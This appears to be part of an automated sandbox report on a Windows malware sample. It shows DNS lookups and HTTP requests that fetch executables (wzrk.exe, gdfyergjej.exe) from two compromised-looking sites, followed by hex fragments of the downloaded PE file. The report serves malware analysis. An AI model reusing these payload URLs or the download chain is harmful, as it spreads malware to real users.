Aug 8, 2014 11:26:08.477502108 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477509022 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477544069 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477639914 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477669954 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477757931 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477763891 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477768898 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477773905 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477777004 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477926016 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477946043 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478023052 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.478095055 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.478277922 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478291988 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478305101 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478312016 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478513956 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.478532076 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478607893 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.478754044 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478766918 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478779078 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.478864908 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.478879929 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479079962 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.479152918 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.479317904 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479331017 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479341984 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479351044 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479554892 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.479561090 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479573011 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479631901 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.479644060 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479784966 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.479840040 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.480115891 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.480267048 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.481939077 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.486717939 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.486732006 MESZ801032213.186.33.87192.168.1.13

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2014 11:26:00.374351025 MESZ | 64194 | 53 | 192.168.1.13 | 195.186.1.121
Aug 8, 2014 11:26:00.858766079 MESZ | 53 | 64194 | 195.186.1.121 | 192.168.1.13
Aug 8, 2014 11:26:01.829366922 MESZ | 53230 | 53 | 192.168.1.13 | 195.186.1.121
Aug 8, 2014 11:26:02.723957062 MESZ | 53 | 53230 | 195.186.1.121 | 192.168.1.13
Aug 8, 2014 11:26:03.799379110 MESZ | 60197 | 53 | 192.168.1.13 | 195.186.1.121
Aug 8, 2014 11:26:04.255403996 MESZ | 53 | 60197 | 195.186.1.121 | 192.168.1.13

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 8, 2014 11:26:00.374351025 MESZ | 192.168.1.13 | 195.186.1.121 | 0xd5c0 | Standard query (0) | pensionmagda.cz | A (IP address) | IN (0x0001)
Aug 8, 2014 11:26:01.829366922 MESZ | 192.168.1.13 | 195.186.1.121 | 0x5c04 | Standard query (0) | www.pensionmagda.cz | A (IP address) | IN (0x0001)
Aug 8, 2014 11:26:03.799379110 MESZ | 192.168.1.13 | 195.186.1.121 | 0xe9a3 | Standard query (0) | pianossimi.fr | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 8, 2014 11:26:00.858766079 MESZ | 195.186.1.121 | 192.168.1.13 | 0xd5c0 | No error (0) | pensionmagda.cz |  | 217.198.114.63 | A (IP address) | IN (0x0001)
Aug 8, 2014 11:26:02.723957062 MESZ | 195.186.1.121 | 192.168.1.13 | 0x5c04 | No error (0) | www.pensionmagda.cz |  | 217.198.114.63 | A (IP address) | IN (0x0001)
Aug 8, 2014 11:26:04.255403996 MESZ | 195.186.1.121 | 192.168.1.13 | 0xe9a3 | No error (0) | pianossimi.fr |  | 213.186.33.87 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

  • pensionmagda.cz
  • www.pensionmagda.cz
  • pianossimi.fr

HTTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transferred (KB)
Timestamp: Aug 8, 2014 11:26:00.871073961 MESZ | Source Port: 1030 | Dest Port: 80 | Source IP: 192.168.1.13 | Dest IP: 217.198.114.63
GET /wzrk.exe HTTP/1.0
Host: pensionmagda.cz
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Total Bytes Transferred (KB): 0

Timestamp: Aug 8, 2014 11:26:01.548276901 MESZ | Source Port: 80 | Dest Port: 1030 | Source IP: 217.198.114.63 | Dest IP: 192.168.1.13
HTTP/1.1 301 Moved Permanently
Date: Fri, 08 Aug 2014 09:26:01 GMT
Server: Apache/2.2.16 (Debian)
Location: http://www.pensionmagda.cz/wzrk.exe
Vary: Accept-Encoding
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.pensionmagda.cz/wzrk.exe">
Total Bytes Transferred (KB): 1

Timestamp: Aug 8, 2014 11:26:01.817989111 MESZ | Source Port: 80 | Dest Port: 1030 | Source IP: 217.198.114.63 | Dest IP: 192.168.1.13
Data Ascii: here</a>.</p><hr><address>Apache/2.2.16 (Debian) Server at pensionmagda.cz Port 80</address></body></html>
Total Bytes Transferred (KB): 1

Timestamp: Aug 8, 2014 11:26:02.725887060 MESZ | Source Port: 1031 | Dest Port: 80 | Source IP: 192.168.1.13 | Dest IP: 217.198.114.63
GET /wzrk.exe HTTP/1.0
Host: www.pensionmagda.cz
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Total Bytes Transferred (KB): 2

Timestamp: Aug 8, 2014 11:26:03.618908882 MESZ | Source Port: 80 | Dest Port: 1031 | Source IP: 217.198.114.63 | Dest IP: 192.168.1.13
HTTP/1.1 404 Not Found
Date: Fri, 08 Aug 2014 09:26:03 GMT
Server: Apache/2.2.16 (Debian)
Vary: accept-language,accept-charset,Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Fri, 08 Aug 2014 09:26:03 GMT
Data Ascii: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" la
Total Bytes Transferred (KB): 2

Timestamp: Aug 8, 2014 11:26:03.795463085 MESZ | Source Port: 80 | Dest Port: 1031 | Source IP: 217.198.114.63 | Dest IP: 192.168.1.13
Data Ascii: ng="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:webmaster@pensionmagda.cz" /><style type="text/css"> /*--><![CDATA[/*> */ body { color: #000000; background-color: #FFFFFF; } a:link {
Total Bytes Transferred (KB): 3

Timestamp: Aug 8, 2014 11:26:04.257400990 MESZ | Source Port: 1032 | Dest Port: 80 | Source IP: 192.168.1.13 | Dest IP: 213.186.33.87
GET /gdfyergjej.exe HTTP/1.0
Host: pianossimi.fr
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Total Bytes Transferred (KB): 4

Timestamp: Aug 8, 2014 11:26:04.882350922 MESZ | Source Port: 80 | Dest Port: 1032 | Source IP: 213.186.33.87 | Dest IP: 192.168.1.13
HTTP/1.1 200 OK
Set-Cookie: startBAK=R3415743754; path=/; expires=Fri, 08-Aug-2014 10:30:14 GMT
Date: Fri, 08 Aug 2014 09:26:04 GMT
Content-Type: application/x-msdownload
Content-Length: 418304
Connection: close
Set-Cookie: start=R3918401403; path=/; expires=Fri, 08-Aug-2014 10:31:01 GMT
Server: Apache
Last-Modified: Mon, 02 Jun 2014 09:32:57 GMT
Accept-Ranges: bytes
Total Bytes Transferred (KB): 5

Timestamp: Aug 8, 2014 11:26:04.924474955 MESZ | Source Port: 80 | Dest Port: 1032 | Source IP: 213.186.33.87 | Dest IP: 192.168.1.13
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$9kZ}4}4}4||4trn4}54}4e4|i4||4||4Rich}4PEL+
Total Bytes Transferred (KB): 6
50
Aug 8, 2014 11:26:05.261928082 MESZ801032213.186.33.87192.168.1.13Data Raw: fe ff ff 83 c8 35 83 e0 1f 89 85 2c fe ff ff 83 bd c0 fe ff ff 00 74 19 0f b6 0d 5c f7 42 00 0f b6 15 06 18 44 00 0b ca 83 e1 1f 88 0d 8a 53 45 00 eb 0c ff 15 74 62 42 00 ff 15 64 62 42 00 b8 8c 00 00 00 66 89 85 f4 fc ff ff 66 8b 8d d8 fc ff ff
Data Ascii: 5,t\BDSEtbBdbBfffRE+tREQMD+fRE`Pj`BjEjSE8bBH`B`BfSE)E0ODsCaDMDY
52
Aug 8, 2014 11:26:05.262546062 MESZ801032213.186.33.87192.168.1.13Data Raw: 83 e1 1f ba 1a 00 00 00 d3 e2 88 15 50 4d 44 00 eb 12 ff 15 08 60 42 00 ff 15 58 61 42 00 ff 15 a0 61 42 00 c7 45 84 6b 01 00 00 eb 09 8b 45 84 83 e8 01 89 45 84 81 7d 84 cd 00 00 00 76 1a 0f b6 0d 68 24 43 00 33 d2 81 f9 a2 00 00 00 0f 9f c2 88
Data Ascii: PMD`BXaBaBEkEE}vh$C3RMDosRE?f|`B(aB8`BE`Qj`BREfND$aBxbBt3
53
Aug 8, 2014 11:26:05.265361071 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 c7 05 cc 4e 44 00 00 00 00 00 eb 12 ff 15 2c 62 42 00 ff 15 b4 61 42 00 ff 15 94 60 42 00 0f b6 05 e9 af 43 00 99 b9 a4 00 00 00 f7 f9 a2 90 53 45 00 0f bf 15 a4 4e 44 00 b8 83 00 00 00 2b c2 a2 d4 53 45 00 eb 0c ff 15 28 62 42 00 ff 15 1c 61
Data Ascii: ND,bBaB`BCSEND+SE(bBaB=f4OD@SE@k~79D"QMD@@SE4OD3RMD`Pj`BfNDycfNDNDVS
54
Aug 8, 2014 11:26:05.265391111 MESZ801032213.186.33.87192.168.1.13Data Raw: 55 94 43 00 89 15 94 53 45 00 0f be 05 51 4d 44 00 33 c9 3b 05 94 53 45 00 0f 9d c1 89 4d 88 8b 95 d4 fe ff ff 3b 95 94 fe ff ff 75 12 8b 45 88 33 d2 b9 41 00 00 00 f7 f1 88 15 d4 53 45 00 eb 12 ff 15 98 62 42 00 ff 15 4c 60 42 00 ff 15 70 60 42
Data Ascii: UCSEQMD3;SEM;uE3ASEbBL`Bp`B,Ch`Pj`BQMD^QMDtfNDrx@=tfnMDaBaBbBMDSESE-RMD`Rj`B
56
Aug 8, 2014 11:26:05.265400887 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 00 0f b7 05 e8 4e 44 00 0d 84 00 00 00 89 85 d8 fe ff ff eb 0c ff 15 bc 62 42 00 ff 15 58 62 42 00 c6 05 8a 53 45 00 99 c7 85 14 fd ff ff 1b 00 00 00 eb 0f 8b 8d 14 fd ff ff 83 c1 10 89 8d 14 fd ff ff 83 bd 14 fd ff ff 5f 7d 0c c7 85 cc fe ff
Data Ascii: NDbBXbBSE_}@C#UffNDNDMdaBh`B8aBSEJSE3QMD3=SEfMPMDPMD3SEV
57
Aug 8, 2014 11:26:05.277621031 MESZ801032213.186.33.87192.168.1.13Data Raw: b3 00 00 00 0f 94 c2 89 95 08 fd ff ff eb 06 ff 15 64 60 42 00 b8 11 00 00 00 66 a3 a4 4e 44 00 c7 85 68 fc ff ff 00 00 00 00 eb 0f 8b 8d 68 fc ff ff 83 c1 01 89 8d 68 fc ff ff 81 bd 68 fc ff ff 01 02 00 00 7d 14 68 01 02 00 00 8d 95 b0 fd ff ff
Data Ascii: d`BfNDhhhh}hRaB#C9f:SE:SEVSE3;EbBTGDBND`Pj`B1BNDSE`BEl8"#~Bf
58
Aug 8, 2014 11:26:05.277626991 MESZ801032213.186.33.87192.168.1.13Data Raw: d9 c7 85 50 fc ff ff 00 00 00 00 eb 0f 8b 95 50 fc ff ff 83 c2 01 89 95 50 fc ff ff 81 bd 50 fc ff ff 00 02 00 00 7d 14 68 00 02 00 00 8d 85 b0 fd ff ff 50 ff 15 88 61 42 00 eb d1 0f b6 0d 72 78 40 00 89 0d 0c 4e 44 00 66 8b 15 0c 4e 44 00 66 89
Data Ascii: PPPP}hPaBrx@NDfNDfNDNDLbB$bB$bB$DRERE|B+URE"RESEEfNDtSE1E3tfUND4O
60
Aug 8, 2014 11:26:05.277746916 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 c7 85 d8 fe ff ff 06 00 00 00 c7 45 ec 0a 00 00 00 b9 43 00 00 00 66 89 8d f4 fc ff ff c7 85 38 fe ff ff f7 00 00 00 8b 85 d8 fe ff ff 6b c0 29 2b 45 ec 33 d2 b9 01 00 00 00 f7 f1 83 c2 0d 89 95 14 fb ff ff 83 bd 14 fb ff ff 0d 74 02 eb 2b 8b
Data Ascii: ECf8k)+E3t+t]SE8fPSEjjdPhODhODbB$bBfNDz@NDDHHHH
60
Aug 8, 2014 11:26:05.281863928 MESZ801032213.186.33.87192.168.1.13Data Raw: 45 00 33 ca 81 e1 00 00 00 80 79 05 49 83 c9 ff 41 83 c1 0d 89 8d 0c fb ff ff 83 bd 0c fb ff ff 0d 74 02 eb 1f 0f b6 05 57 53 45 00 33 c9 83 f8 7a 0f 94 c1 89 0d 94 4e 44 00 c7 05 d4 4e 44 00 27 00 00 00 c7 45 84 49 00 00 00 e9 93 00 00 00 0f b6
Data Ascii: E3yIAtWSE3zNDND'EIWSE3fND;D%yJBtVSEDfMDMDMSEbB`B
61
Aug 8, 2014 11:26:05.294123888 MESZ801032213.186.33.87192.168.1.13Data Raw: 66 89 15 b0 4d 44 00 0f b7 05 b0 4d 44 00 25 b8 00 00 00 83 e0 1f 66 a3 e4 52 45 00 eb 06 ff 15 84 60 42 00 8a 0d 14 4f 44 00 88 0d 90 53 45 00 c6 05 ab 53 45 00 e4 ba 87 00 00 00 66 89 15 b0 4d 44 00 a0 b0 4d 44 00 a2 cc 53 45 00 0f be 0d cc 53
Data Ascii: fMDMD%fRE`BODSESEfMDMDSESEMVCSE+fNDFv:SE3pVSEM@@@@}hRaB
62
Aug 8, 2014 11:26:05.294226885 MESZ801032213.186.33.87192.168.1.13Data Raw: eb 12 ff 15 3c 61 42 00 ff 15 70 60 42 00 ff 15 2c 62 42 00 ba b3 00 00 00 66 89 55 f4 0f bf 45 f4 a3 7c 4e 44 00 b9 b7 00 00 00 85 c9 74 0a c7 05 38 4f 44 00 01 00 00 00 8d 95 60 ff ff ff 52 6a 00 ff 15 10 60 42 00 c7 85 94 fd ff ff 1d 00 00 00
Data Ascii: <aBp`B,bBfUE|NDt8OD`Rj`BE3MD|DE8D33ZZthU9NDEaBSEfTCfND8ODf8ODfNDC
63
Aug 8, 2014 11:26:05.309199095 MESZ801032213.186.33.87192.168.1.13Data Raw: 05 8e 00 00 00 89 85 f8 fa ff ff 81 bd f8 fa ff ff 8e 00 00 00 74 02 eb 2e 0f b7 0d e8 4e 44 00 0f b6 15 f1 38 43 00 0f af ca 88 0d 98 53 45 00 0f bf 05 f0 4e 44 00 33 c9 3d e8 00 00 00 0f 9c c1 88 0d 51 4d 44 00 8b 95 80 fd ff ff 33 c0 3b 95 68
Data Ascii: t.ND8CSEND3=QMD3;hWSE3PMDD4444}hPaBDtEE%+tjD;~\
64
Aug 8, 2014 11:26:05.309206009 MESZ801032213.186.33.87192.168.1.13Data Raw: af 05 30 4f 44 00 0f b7 8d f4 fc ff ff 2b c1 74 1c 0f bf 15 ec 4e 44 00 0f b7 05 be 4d 44 00 03 d0 83 e2 1f 66 89 15 34 4f 44 00 eb 0e b9 28 00 00 00 2b 8d 4c fe ff ff 89 4d ec c7 85 2c fe ff ff 01 00 00 00 eb 06 ff 15 58 61 42 00 0f b6 15 6d 87
Data Ascii: 0OD+tNDMDf4OD(+LM,XaBmBREREfNDU3v\`BMfD8OD=8OD[fODXaB`BxjjdRhODhO
66
Aug 8, 2014 11:26:05.309207916 MESZ801032213.186.33.87192.168.1.13Data Raw: e1 1f 66 89 4d f4 eb 12 ff 15 6c 62 42 00 ff 15 70 61 42 00 ff 15 18 61 42 00 0f b6 15 22 94 42 00 89 15 30 4f 44 00 0f b6 05 f3 27 43 00 8b 0d 30 4f 44 00 83 e1 1f d3 f8 a2 56 53 45 00 8d 8d 60 ff ff ff 51 6a 00 ff 15 10 60 42 00 c6 05 ec 52 45
Data Ascii: fMlbBpaBaB"B0OD'C0ODVSE`Qj`BREREPND;NDfMDW~DAARE3;x3=PND@aBbBjjdQh
67
Aug 8, 2014 11:26:05.309315920 MESZ801032213.186.33.87192.168.1.13Data Raw: c0 60 42 00 ff 15 ac 61 42 00 ff 15 38 62 42 00 c7 85 80 fd ff ff ae 00 00 00 8b 95 80 fd ff ff 89 95 2c fe ff ff 8b 85 74 fd ff ff a3 d0 53 45 00 ba 9c 00 00 00 8b 4d c8 d3 e2 85 d2 74 11 8b 85 2c fe ff ff 83 e0 12 66 a3 f8 4e 44 00 eb 31 0f b6
Data Ascii: `BaB8bB,tSEMt,fND1EtB3;
67
Aug 8, 2014 11:26:05.316991091 MESZ801032213.186.33.87192.168.1.13Data Raw: d0 53 45 00 0f 95 c0 89 45 e0 eb 0f 8b 8d 98 fe ff ff 83 c9 25 89 8d 10 fd ff ff 6a 00 6a 00 8d 95 64 fe ff ff 52 68 f0 4f 44 00 68 f4 4f 44 00 ff 15 f8 62 42 00 0f b6 05 50 12 42 00 0d b0 00 00 00 89 85 78 ff ff ff eb 0b ff 15 38 60 42 00 e8 45
Data Ascii: SEE%jjdRhODhODbBPBx8`BE]CSEDPDDD}EESESESE+fNDaBD'fDf0SE0SE3
69
Aug 8, 2014 11:26:05.317002058 MESZ801032213.186.33.87192.168.1.13Data Raw: ff eb 06 ff 15 f4 60 42 00 0f b6 05 1d 2a 42 00 0f b6 0d 9d 41 42 00 d3 f8 66 a3 a4 4e 44 00 c7 85 6c ff ff ff 58 00 00 00 c7 85 6c ff ff ff b9 00 00 00 33 c9 81 bd 6c ff ff ff 95 00 00 00 0f 95 c1 83 e1 1f 89 8d 54 fe ff ff 8b 15 e8 52 45 00 23
Data Ascii: `B*BABfNDlXl3lTRE#8ODPMDllfCifMDl-|bBaB,bBfNDf%LaB
70
Aug 8, 2014 11:26:05.317274094 MESZ801032213.186.33.87192.168.1.13Data Raw: ff 0f 94 c1 66 89 0d f0 4e 44 00 eb cf c7 85 20 fc ff ff 00 00 00 00 eb 0f 8b 95 20 fc ff ff 83 c2 01 89 95 20 fc ff ff 81 bd 20 fc ff ff 02 02 00 00 7d 14 68 02 02 00 00 8d 85 b0 fd ff ff 50 ff 15 88 61 42 00 eb d1 0f bf 0d 1a 4f 44 00 81 c9 fd
Data Ascii: fND }hPaBODWSEffMDWSEMDtNDaB`BffMDnB]<Et7kkxM
71
Aug 8, 2014 11:26:05.321636915 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 c7 85 2c fe ff ff 6e 00 00 00 8b 85 2c fe ff ff 89 85 d8 fe ff ff 0f bf 05 a4 4e 44 00 99 b9 81 00 00 00 f7 f9 33 c0 81 fa b5 00 00 00 0f 9d c0 25 00 00 00 80 79 05 48 83 c8 ff 40 05 92 00 00 00 89 85 d0 fa ff ff 81 bd d0 fa ff ff 92 00 00 00
Data Ascii: ,n,ND3%yH@t.-U9,[#D+SERMD;U`BaB`BA/xfMDfMDfpSEfnBf
73
Aug 8, 2014 11:26:05.321665049 MESZ801032213.186.33.87192.168.1.13Data Raw: 44 00 68 20 50 44 00 ff 15 f8 62 42 00 0f b6 05 21 70 40 00 33 c9 3d 99 00 00 00 0f 9e c1 66 89 0d e8 4e 44 00 eb 12 ff 15 dc 61 42 00 ff 15 88 60 42 00 ff 15 d8 61 42 00 c7 45 88 50 00 00 00 0f b6 15 57 53 45 00 33 c0 83 fa 11 0f 94 c0 a2 51 4d
Data Ascii: Dh PDbB!p@3=fNDaB`BaBEPWSE3QMD [B}EfMDMDSESE3@f$SE$SEKf*SEH
74
Aug 8, 2014 11:26:05.321675062 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 83 e2 1f 66 89 15 e8 4e 44 00 eb 2a 8b 45 9c 33 c9 3b 05 d0 53 45 00 0f 94 c1 89 8d e4 fc ff ff 0f bf 15 1a 4f 44 00 81 f2 f1 00 00 00 83 e2 1f 89 95 14 fd ff ff c7 85 10 fc ff ff 00 00 00 00 eb 0f 8b 85 10 fc ff ff 83 c0 01 89 85 10 fc ff ff
Data Ascii: fND*E3;SEOD}hQaBUDCB3;UXRMD+3tyIAt3t
75
Aug 8, 2014 11:26:05.326406956 MESZ801032213.186.33.87192.168.1.13Data Raw: 34 8b 45 ec 2b 85 c0 fe ff ff 74 12 8b 8d 58 fe ff ff 03 4d 9c 66 89 0d 16 53 45 00 eb 17 0f be 0d 8a 53 45 00 83 e1 1f ba a8 00 00 00 d3 e2 89 95 cc fe ff ff eb 0c ff 15 dc 60 42 00 ff 15 04 61 42 00 8b 85 6c ff ff ff 99 b9 a3 00 00 00 f7 f9 89
Data Ascii: 4E+tXMfSESE`BaBl+f`Pj`B_BWSESEKSEt$WSE,LSESE3kU
76
Aug 8, 2014 11:26:05.326435089 MESZ801032213.186.33.87192.168.1.13Data Raw: ff ff 81 bd 08 fc ff ff 00 02 00 00 7d 02 eb e3 ba fa 00 00 00 66 89 95 9c fe ff ff 8a 85 9c fe ff ff a2 8a 53 45 00 0f b6 0d 02 fe 43 00 0f be 15 8a 53 45 00 33 c0 3b ca 0f 9d c0 66 a3 ec 4e 44 00 66 8b 8d 74 fd ff ff 66 89 0d 2c 4f 44 00 c7 85
Data Ascii: }fSECSE3;fNDftf,ODH0HHH~fvSEbBREjjdRh$PDh0PDbBA3=f*OD*ODU\bBt`BpaB
78
Aug 8, 2014 11:26:05.326962948 MESZ801032213.186.33.87192.168.1.13Data Raw: 4e 44 00 d4 00 00 00 e9 a8 00 00 00 c6 05 56 53 45 00 01 33 c9 81 bd 68 ff ff ff f3 00 00 00 0f 94 c1 0f b7 15 40 53 45 00 33 c0 3b ca 0f 94 c0 25 00 00 00 80 79 05 48 83 c8 ff 40 05 e3 00 00 00 89 85 9c fa ff ff 81 bd 9c fa ff ff e3 00 00 00 74
Data Ascii: NDVSE3h@SE3;%yH@t.3hTSEQ?E+tiSE>oB#UfH`BbBHbBSEE,>SERERE;,
79
Aug 8, 2014 11:26:05.335059881 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 00 89 95 d0 fe ff ff c7 45 84 1e 00 00 00 8b 45 84 89 85 44 fe ff ff c6 05 90 53 45 00 91 8a 0d 90 53 45 00 88 0d 98 53 45 00 ba 1a 00 00 00 85 d2 74 4c c7 85 48 ff ff ff 01 00 00 00 8b 85 6c ff ff ff 99 b9 90 00 00 00 f7 f9 0d ec 00 00 00 74
Data Ascii: EEDSESESEtLHltxSETDNDSE#NDSEfNDaB,bBxxE<MM}`vQABf
80
Aug 8, 2014 11:26:05.335089922 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 00 8b 8d e0 fc ff ff 83 c1 07 89 8d e0 fc ff ff 0f be 15 8a 53 45 00 33 c0 83 fa 42 0f 9f c0 a2 ec 52 45 00 81 bd e0 fc ff ff 49 01 00 00 7c d1 eb 0c ff 15 c4 62 42 00 ff 15 a4 60 42 00 c7 45 e0 11 00 00 00 c6 05 8a 53 45 00 ef 0f be 0d 8a 53
Data Ascii: SE3BREI|bB`BESESESEfUfRE3PAtU;SERERE;uSE}hQ
82
Aug 8, 2014 11:26:05.335099936 MESZ801032213.186.33.87192.168.1.13Data Raw: 66 89 15 6c 4d 44 00 c6 05 a7 53 45 00 01 c7 85 ec fb ff ff 00 00 00 00 eb 0f 8b 95 ec fb ff ff 83 c2 01 89 95 ec fb ff ff 81 bd ec fb ff ff 01 02 00 00 7d 02 eb e3 66 0f b6 05 75 f5 42 00 66 a3 e4 52 45 00 66 8b 0d e4 52 45 00 66 89 8d f4 fc ff
Data Ascii: flMDSE}fuBfREfREf0ODE4bB(aBaBND3=P}hPaBfMDMDLH
83
Aug 8, 2014 11:26:05.338382959 MESZ801032213.186.33.87192.168.1.13Data Raw: 89 95 d0 fe ff ff 0f b6 05 37 ec 41 00 33 c9 83 f8 76 0f 95 c1 89 8d c0 fe ff ff 8b 95 3c ff ff ff 33 c0 3b 95 10 fd ff ff 0f 94 c0 a3 64 4e 44 00 c7 85 54 fe ff ff 01 00 00 00 eb 06 ff 15 cc 62 42 00 c7 05 d0 53 45 00 65 00 00 00 c7 45 a0 4c 00
Data Ascii: 7A3v<3;dNDTbBSEeELfMfNDttt-3=SE,ND3^DpptC\fDbB"f4OD4OD
84
Aug 8, 2014 11:26:05.338412046 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 00 00 0f b6 0d 91 11 42 00 ba bb 00 00 00 d3 fa 89 95 60 fe ff ff eb 06 ff 15 70 62 42 00 0f b6 05 bf 79 44 00 33 c9 83 f8 76 0f 94 c1 88 0d ae 53 45 00 c7 85 e0 fb ff ff 00 00 00 00 eb 0f 8b 95 e0 fb ff ff 83 c2 01 89 95 e0 fb ff ff 81 bd e0
Data Ascii: B`pbByD3vSE}NDSESE3HSEfJDfNDffEfMfvSENDtTRE0OD33
86
Aug 8, 2014 11:26:05.338931084 MESZ801032213.186.33.87192.168.1.13Data Raw: 7d 14 68 01 02 00 00 8d 8d b0 fd ff ff 51 ff 15 88 61 42 00 eb d1 c7 05 14 4e 44 00 01 00 00 00 eb 12 ff 15 0c 62 42 00 ff 15 94 62 42 00 ff 15 5c 62 42 00 c7 05 38 4f 44 00 b0 00 00 00 c7 85 14 fd ff ff 03 00 00 00 8b 95 84 fd ff ff 89 95 08 fd
Data Ascii: }hQaBNDbBbB\bB8ODX8OD33<tRE#XtRMD}hPaB\E6C
86
Aug 8, 2014 11:26:05.394205093 MESZ801032213.186.33.87192.168.1.13Data Raw: c0 81 fa e5 00 00 00 0f 9e c0 83 e0 1f 89 85 58 fe ff ff 8d 8d 60 ff ff ff 51 6a 00 ff 15 10 60 42 00 ba ae 11 00 00 85 d2 74 14 0f b6 05 5d ff 42 00 0d a4 00 00 00 89 85 7c fd ff ff eb 07 c7 45 88 01 00 00 00 eb 06 ff 15 d8 61 42 00 c7 85 30 ff
Data Ascii: X`Qj`Bt]B|EaB0}hRaBSE3=SE}aBcC jjdRhHPDhPPDbBf<SE
87
Aug 8, 2014 11:26:05.402489901 MESZ801032213.186.33.87192.168.1.13Data Raw: ff 8b 85 d8 fc ff ff 89 85 38 fe ff ff 8b 8d 84 fd ff ff 81 e1 8b 00 00 00 74 1a 0f b6 0d 6a 2f 44 00 83 e1 1f ba ce 00 00 00 d3 fa 66 89 15 34 4f 44 00 eb 16 8b 8d 38 fe ff ff 83 e1 1f b8 3c 00 00 00 d3 e0 89 85 c8 fc ff ff c7 85 c4 fc ff ff 18
Data Ascii: 8tj/Df4OD8<\~;E3NDXbB`BbBPnxfOD0OD0ODOD+0ODfMDf^D+
89
